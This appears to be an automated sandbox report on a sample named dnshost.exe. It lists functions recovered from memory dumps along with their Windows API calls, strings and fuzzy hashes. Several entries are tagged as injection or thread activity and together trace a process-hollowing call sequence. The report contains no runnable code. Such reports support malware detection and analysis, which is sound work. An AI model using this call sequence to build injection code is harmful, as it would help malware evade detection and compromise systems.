Opcode ID: d4edeb22e24a227f13f94c5e9962c7e6fb77687f47aa6c17c62c91ae0a537b47
Instruction ID: a1301587266790893738e327f73b24498f55edddb5c7d1c1a28b6e5bfdfb1e33
Opcode Fuzzy Hash: d4edeb22e24a227f13f94c5e9962c7e6fb77687f47aa6c17c62c91ae0a537b47
Instruction Fuzzy Hash: 7821E4B990024DDFDB10CF9AD984ADEBFF9EB48320F54841AE918A7350D374A944CFA5

Function 0130D658 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0130D626,?,?,?,?,?), ref: 0130D6E7

Memory Dump Source

Source File: 00000011.00000002.2136319428.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1300000_dnshost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cdbe36962d3991bf7756773942a741d4a59a7e7d64bb930452e7c415b681c475
Instruction ID: a21976acaad1a7e54f6557114ebbe052570f848dd1f63f4c9367af957dc03036
Opcode Fuzzy Hash: cdbe36962d3991bf7756773942a741d4a59a7e7d64bb930452e7c415b681c475
Instruction Fuzzy Hash: BB21E5B5900209DFDB10CF9AD984ADEBFF9EB48320F14841AE918A7350C375A944CF65

Function 0130AF78 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0130AFDE

Memory Dump Source

Source File: 00000011.00000002.2136319428.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1300000_dnshost.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cc9671b9a9ca490ef604388df28a91bcc5bbe41fba8117e0aedb7c17c3aa9bff
Instruction ID: 3c4876c3ec3b8dee473e564ab4bee3598c6c3d1384da747bc83ff50b6f18265a
Opcode Fuzzy Hash: cc9671b9a9ca490ef604388df28a91bcc5bbe41fba8117e0aedb7c17c3aa9bff
Instruction Fuzzy Hash: 2911E0B6C003498FDB10CF9AD944ADEFBF5EF88324F14841AD529A7650C379A549CFA1

Function 010AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2135237056.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_10ad000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00674cadbd07ac26611929b9e4ad53fddb79edcb5fd386dd69211638dd4747bf
Instruction ID: 6ad6f299e144e45f145c86a0662787b4efd7c9c833306b3c78b725251a2d708d
Opcode Fuzzy Hash: 00674cadbd07ac26611929b9e4ad53fddb79edcb5fd386dd69211638dd4747bf
Instruction Fuzzy Hash: A8212571544200DFCB15DF98D980F16BBA5EB88354F60C9ADE9894B646C33AD407CB61

Function 010AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2135237056.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_10ad000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e68befced82880a85cdf5a6b9ffb4354d62c600d0e25664d91846aa6756a6ae3
Instruction ID: 77d29365688a8786dca29ad26761896691cbcd930ba05e6d6f3c4ce064c01998
Opcode Fuzzy Hash: e68befced82880a85cdf5a6b9ffb4354d62c600d0e25664d91846aa6756a6ae3
Instruction Fuzzy Hash: 122171755483809FCB03CF64D994B11BFB1EB46214F28C5DAD8898F6A7C33A9816CB62

Analysis Process: dnshost.exePID: 8060, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	301
Total number of Limit Nodes:	18

Executed Functions

Function 06BFCD54 Relevance: 11.0, Strings: 8, Instructions: 965
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hiq, xrefs: 06BFF0D3
Hiq, xrefs: 06BFECB1
(iq, xrefs: 06BFE9AD
Hiq, xrefs: 06BFF292
Hiq, xrefs: 06BFEE70
Hiq, xrefs: 06BFF074
Hiq, xrefs: 06BFEC52
PHeq, xrefs: 06BFE981

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID: (iq$Hiq$Hiq$Hiq$Hiq$Hiq$Hiq$PHeq
API String ID: 0-201796279
Opcode ID: 18c1c422b50b395f6cc750e74cb0b583dca90cb5428e608adf9783d7fbc821af
Instruction ID: 425af5bf008e0faa6516909a285e7e15867f20c6bd783a8fdf654138856cd747
Opcode Fuzzy Hash: 18c1c422b50b395f6cc750e74cb0b583dca90cb5428e608adf9783d7fbc821af
Instruction Fuzzy Hash: 8572D2B0B102149FCB48EB78C85566E7BA6EFC8310F249569E106DB3A5CE30ED46C7A1

Function 06BF2106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON

Download Yara Rule

Strings

D, xrefs: 06BF210B

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 1de19b8dab5fbf9deb989368f4afdcb4fc483f64122e105a7a9f5b0f1ccebd3c
Instruction ID: 1a527fe0c3f38d415973b1512b19f337431634e8dd9ff3b5c2b8b2dac592a2cb
Opcode Fuzzy Hash: 1de19b8dab5fbf9deb989368f4afdcb4fc483f64122e105a7a9f5b0f1ccebd3c
Instruction Fuzzy Hash: 0152CC74A112288FDB64DF64D899A9DBBB2FF89310F1041D9D50AA73A5CB34AEC1CF50

Function 06BF6CE8 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c6250986427c9f95f3a6865a3a73251a3773f2dba59ceb8e92be0d269425aa
Instruction ID: b94eeff2bd43d67f3d519c6773311f4106954378f6aeab0d7e0f7f0127cd6a09
Opcode Fuzzy Hash: 05c6250986427c9f95f3a6865a3a73251a3773f2dba59ceb8e92be0d269425aa
Instruction Fuzzy Hash: 395239B0A10604CFCB54DF68D588A5DB7F2FF88314F6595A8E50A9B361DB31ED8ACB40

Function 06BF6CD8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 765b6cb64ef55f907caf28bee5f803950c24212a1941692f88e6bb3ca59c90e1
Instruction ID: 20a02663dfe6d4cddd8ead3a822f65e6ff6bf8574631bea23dafaece51f8b2cf
Opcode Fuzzy Hash: 765b6cb64ef55f907caf28bee5f803950c24212a1941692f88e6bb3ca59c90e1
Instruction Fuzzy Hash: ACD1F574A20204CFDB94CF68D588A98B7F2FF44315F6591E9E9099B271DB30ED8ACB40

Function 00E9D530 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E9D5BE
GetCurrentThread.KERNEL32 ref: 00E9D5FB
GetCurrentProcess.KERNEL32 ref: 00E9D638
GetCurrentThreadId.KERNEL32 ref: 00E9D691

Strings

4'eq, xrefs: 00E9D509

Memory Dump Source

Source File: 00000013.00000002.2154469466.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e90000_dnshost.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4'eq
API String ID: 2063062207-1552367303
Opcode ID: 977bc96ad5661e8e7933e97a738a7b7c5a7c4b24d1f9d2bfd77b80bb16ea00bb
Instruction ID: 954f37a13989190fa471adf09fb532ec7a4a5ac083c98c572df6c84640fcbefa
Opcode Fuzzy Hash: 977bc96ad5661e8e7933e97a738a7b7c5a7c4b24d1f9d2bfd77b80bb16ea00bb
Instruction Fuzzy Hash: 736177B4905249CFCB04DFA9D948B9EBBF1FF89304F208459E009BB2A1DB746948CF61

Function 00E9D540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E9D5BE
GetCurrentThread.KERNEL32 ref: 00E9D5FB
GetCurrentProcess.KERNEL32 ref: 00E9D638
GetCurrentThreadId.KERNEL32 ref: 00E9D691

Memory Dump Source

Source File: 00000013.00000002.2154469466.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e90000_dnshost.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 06c5fb2eaaacddec094f8ace83c435bcc50fc5726a725d24dd2cbadd55d1b770
Instruction ID: 68e4a415188fda13329dd4bab482883f681818a9e13325f6b9ef6f17866fff97
Opcode Fuzzy Hash: 06c5fb2eaaacddec094f8ace83c435bcc50fc5726a725d24dd2cbadd55d1b770
Instruction Fuzzy Hash: 375173B8900209CFDB14CFAAD948BDEBBF1EF88314F208459E009B72A1D7746948CF65

Function 06BFD580 Relevance: 2.8, Strings: 2, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHeq, xrefs: 06BFD85C
PHeq, xrefs: 06BFD6EE

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID: PHeq$PHeq
API String ID: 0-3382621680
Opcode ID: ee4feef01f175fd6eb523975ec44e854da3905546959f61510d6ec42535dd182
Instruction ID: 48de8f776adf2785ebe9682e5cc670080f605c1810f162afbc9dc4f546d32aad
Opcode Fuzzy Hash: ee4feef01f175fd6eb523975ec44e854da3905546959f61510d6ec42535dd182
Instruction Fuzzy Hash: 0FC125B4A10208CFCB58DF68C594AADBBF2FF89310B1555A8E506AB3B1DB31EC45CB50

Function 06BEE984 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BEEBC6

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c39ef6af996a01d92a05c66fe5eaf911f62e1b46d6fb14ce111a363869a94e16
Instruction ID: 449047fa48f19513ce4e4e0329a9da6182d5d28d484bd796fd0fbf9626a40be3
Opcode Fuzzy Hash: c39ef6af996a01d92a05c66fe5eaf911f62e1b46d6fb14ce111a363869a94e16
Instruction Fuzzy Hash: DAA13CB1D00219DFDB50DF68C881BEDBBB2FF48310F1595A9E809A7250DB749986CF91

Function 06BEE990 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06BEEBC6

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7052f1923fe2929431ea6b801340f920f46b9468bd412dc3e0bcc470c2a12947
Instruction ID: 75d16a6a6d7b66e50810581e5e824a79c73a82e0455ab4c057422cfa29d7d975
Opcode Fuzzy Hash: 7052f1923fe2929431ea6b801340f920f46b9468bd412dc3e0bcc470c2a12947
Instruction Fuzzy Hash: F5913BB1D00219DFDB60DF68C881BEDBBB2FF48310F1595A9E809A7250DB749986CF91

Function 00E9B298 Relevance: 1.7, APIs: 1, Instructions: 205COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E9B4FE

Memory Dump Source

Source File: 00000013.00000002.2154469466.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e90000_dnshost.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 18003527010b088189acb8cffd71869e404bdd4be26bab361080b6af789bffa3
Instruction ID: 6466b0ce217e09045413ae872afd3b52106e12ccb9f5d3fc6d69152662c59159
Opcode Fuzzy Hash: 18003527010b088189acb8cffd71869e404bdd4be26bab361080b6af789bffa3
Instruction Fuzzy Hash: DF8169B0A00B058FDB24DF2AD54575ABBF1FF88304F00992DE44AEBA51E774E945CB91

Function 00E94508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00E959E9

Memory Dump Source

Source File: 00000013.00000002.2154469466.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e90000_dnshost.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 71923220836880bf838841575a73a78ea8ad1a5efda7b7ec858906362b48257d
Instruction ID: 689cacfd9d8f07c3ef7ce6bdd8c964837efa379faa888ec60dc863f865b07112
Opcode Fuzzy Hash: 71923220836880bf838841575a73a78ea8ad1a5efda7b7ec858906362b48257d
Instruction Fuzzy Hash: BE41DFB5C00719CBDB24CFA9C884B9EBBF5BF48304F20816AD419BB251DBB56949CF90

Function 00E9592D Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00E959E9

Memory Dump Source

Source File: 00000013.00000002.2154469466.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e90000_dnshost.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ced77d4b08b4290e33d28bf45ea967b235a4cfc50a8d5fe7c7c03dbbffff93c9
Instruction ID: 09715ee0ea4df2488a39d2313860897b584e6c7a40ac81acd8a1d002b6f50630
Opcode Fuzzy Hash: ced77d4b08b4290e33d28bf45ea967b235a4cfc50a8d5fe7c7c03dbbffff93c9
Instruction Fuzzy Hash: 1A41EFB5C00719CFDB24CFA9C884ADDBBB1BF49304F24816AD409AB251DBB5694ACF50

Function 06BCBFF0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164332520.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bc0000_dnshost.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e48d3e95d80aa87aa7ea8e44e0c396ff827fae8e99fe863f040115de1a02f479
Instruction ID: 0388e813ee2f3b2533cc5f4adb3ae012934163e6eec90328f29a7d0b4cf842fb
Opcode Fuzzy Hash: e48d3e95d80aa87aa7ea8e44e0c396ff827fae8e99fe863f040115de1a02f479
Instruction Fuzzy Hash: 14318EB29043499FCB12DFA9D844ADEBFF8EF09320F14809AF954A7261C3359954DFA1

Function 06BEE700 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BEE798

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 79b5bee51378a0a0d973c1b69000b4804bcce894e415a5594b634600f3d83bf4
Instruction ID: e2d638acb19f1739f14b0f8faf43d1e0673991f3a1c2cb2b4b96e9d1a8bcbc33
Opcode Fuzzy Hash: 79b5bee51378a0a0d973c1b69000b4804bcce894e415a5594b634600f3d83bf4
Instruction Fuzzy Hash: E22157B59003499FDB10CFA9C984BEEBFF5FF48320F10842AE959A7241C7799945DBA0

Function 06BCA2B9 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 06BCA357

Memory Dump Source

Source File: 00000013.00000002.2164332520.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bc0000_dnshost.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: b83fc8ed108ad548418cb8dde6a555fbbf61cfab4152cbb78f9d551609927dfb
Instruction ID: 5abbf8a18f9efde8d775b2ff915d552ae987b15b6186cf1840f0206744b87836
Opcode Fuzzy Hash: b83fc8ed108ad548418cb8dde6a555fbbf61cfab4152cbb78f9d551609927dfb
Instruction Fuzzy Hash: CA31C3B5D002499FDB10CF9AD884ADEFBF4FB48320F14842EE919A7210D775A944CFA0

Function 06BCA2C0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 06BCA357

Memory Dump Source

Source File: 00000013.00000002.2164332520.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bc0000_dnshost.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: d44a9ba79115b3a0b5e39030b37e93eaff2cdecdaf01992b564290e8ee063625
Instruction ID: d33d14b0ac49476fe3b74992b6f86bd96bd3657d41cb0ad5aadda235f8399c2b
Opcode Fuzzy Hash: d44a9ba79115b3a0b5e39030b37e93eaff2cdecdaf01992b564290e8ee063625
Instruction Fuzzy Hash: B321BFB5D002499FDB10CF9AD884ADEFBF5FB58320F54842EE919A7210D775AA44CFA0

Function 06BEE708 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06BEE798

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2f938df9b5a84e91cd5c0cadc42f41c80e2818801a5f1305049eb69f0d37b773
Instruction ID: e20fb1712cbb56dd567cd387f02f6576060ccb4de94d64f53d137b360b6d9d77
Opcode Fuzzy Hash: 2f938df9b5a84e91cd5c0cadc42f41c80e2818801a5f1305049eb69f0d37b773
Instruction Fuzzy Hash: D52139B5D003099FDB10CFA9C985BDEBBF5FF48320F10842AE918A7241D7789945DBA0

Function 06BEE7F1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BEE878

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3febb5e9281375daf2d0e01825c351765fc63a845b9b4545ebabca8bbea5628e
Instruction ID: 05dcf58e16e99e9b4edb70516ffb920cbb5948de49128e062686a97052da8c87
Opcode Fuzzy Hash: 3febb5e9281375daf2d0e01825c351765fc63a845b9b4545ebabca8bbea5628e
Instruction Fuzzy Hash: A52148B1C003499FDB10CFAAC881AEEFBF5FF48320F50842AE919A3241C7349941DBA0

Function 06BEE56B Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BEE5EE

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 42ab7432aceced3cabb8e9b8e5ce3206893ed7f46750e127dc0731b7e795bc5b
Instruction ID: 4b43ab6187114744e695523653f9a2f16381839b243c73f47308b312525cb8f4
Opcode Fuzzy Hash: 42ab7432aceced3cabb8e9b8e5ce3206893ed7f46750e127dc0731b7e795bc5b
Instruction Fuzzy Hash: 8A214C71D003098FDB10DFAAC8857EEBBF4EF48324F14842AD959A7241DB789945CFA4

Function 00E9D780 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E9D80F

Memory Dump Source

Source File: 00000013.00000002.2154469466.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e90000_dnshost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6974c5929263e626d43af5c74470c2a1df5663110b73a3a90e70b861d769f653
Instruction ID: 559eb42dbcd9ddd0ef5beaef533b0e0282a325071f4f740fdcc9dfff9438c5f4
Opcode Fuzzy Hash: 6974c5929263e626d43af5c74470c2a1df5663110b73a3a90e70b861d769f653
Instruction Fuzzy Hash: 432103B5C002589FDB10CFA9D884AEEBFF4FB48320F14802AE914A3211C375A955DF60

Function 06BEE7F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06BEE878

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 62ecc346e7d532c22439e578b56eecb393e74dd3f2571afcb8b79417039ca1d4
Instruction ID: 05b40205464a6b327f59475444d88350519328b66b87b5a8a85124c74b00b2c4
Opcode Fuzzy Hash: 62ecc346e7d532c22439e578b56eecb393e74dd3f2571afcb8b79417039ca1d4
Instruction Fuzzy Hash: 6C2139B1C003499FDB10DFAAC884AEEFBF5FF48320F50842AE918A7250C7749941DBA4

Function 06BEE570 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06BEE5EE

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c22c30af24595d4de4a8619cd98ed24b02f8c762c2902d6ad20cf42beca570c0
Instruction ID: f77b730d4f53bdd245503fd3de1c823d7b3b07893dc394acd0682f24ccd7b8fb
Opcode Fuzzy Hash: c22c30af24595d4de4a8619cd98ed24b02f8c762c2902d6ad20cf42beca570c0
Instruction Fuzzy Hash: 57215BB1D003098FDB10DFAAC8857EEBBF4EF48324F14842AD919A7241DB789945CFA4

Function 00E9D788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E9D80F

Memory Dump Source

Source File: 00000013.00000002.2154469466.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e90000_dnshost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 08e8966375b2edd925c12c76587689750cbf539b6a8e9a037ed91944181f0a88
Instruction ID: 59497edd80cbb2e56bf0cf7eff4db47bb01c378cdfc01a3676b82f5d4d85dfdd
Opcode Fuzzy Hash: 08e8966375b2edd925c12c76587689750cbf539b6a8e9a037ed91944181f0a88
Instruction Fuzzy Hash: F321C2B59002599FDB10CFAAD984ADEBBF8FB48320F14841AE918A3351D374A944DFA5

Function 06BCAF40 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06BCC00A,?,?,?,?,?), ref: 06BCC0AF

Memory Dump Source

Source File: 00000013.00000002.2164332520.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bc0000_dnshost.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 2137b8872424c869ab80ed49f7f41eda57691f7423c0e83b82353d86a2ee5c23
Instruction ID: 70797a938d039a70ff3d5f239bf68bfa37685c82ef12ecf6d007785d537c5a3a
Opcode Fuzzy Hash: 2137b8872424c869ab80ed49f7f41eda57691f7423c0e83b82353d86a2ee5c23
Instruction Fuzzy Hash: D01149B6800349DFDB20DF9AC844BDEBFF8EB58320F14845AE918A7211C375A950DFA5

Function 06BEE643 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BEE6B6

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6b220a6edee821e0bc614c78bd3ac13760e4e937ad0211b0addddebc1926e03d
Instruction ID: ade76646344c6830aa638611467a109d26b4314c20519c0594ba282186603576
Opcode Fuzzy Hash: 6b220a6edee821e0bc614c78bd3ac13760e4e937ad0211b0addddebc1926e03d
Instruction Fuzzy Hash: 381156729002499FDB20DFAAC844BDEFFF5EF88320F14841AE519A7250CB75A940DBA0

Function 06BEE648 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06BEE6B6

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2df9a05c13e22e18c45d0c3aa7a709db1e36cf3bab181d478d6ec153773bef76
Instruction ID: 5495b6148c84d50f3c6e7abe6028b73946145cf83da64e124fbdf0e5aa5410a2
Opcode Fuzzy Hash: 2df9a05c13e22e18c45d0c3aa7a709db1e36cf3bab181d478d6ec153773bef76
Instruction Fuzzy Hash: FF1149729002499FDB10DFAAC844ADFBFF5EF88320F148419E519A7250CB759940DFA0

Function 06BEDC48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06BEDCB2

Memory Dump Source

Source File: 00000013.00000002.2164494275.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6be0000_dnshost.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9478ee66df31e0b20f89ea98126e161293ec26bd0aa704d132ba6d09ff91cfc4
Instruction ID: 667c9f6685f40002732402844155f6ceea675c8327e01adb8fc32afbdbb729ea
Opcode Fuzzy Hash: 9478ee66df31e0b20f89ea98126e161293ec26bd0aa704d132ba6d09ff91cfc4
Instruction Fuzzy Hash: 541149B1D043498FDB20DFAAC84479EFFF4EF98324F24845AD519A7240CB755544CBA0

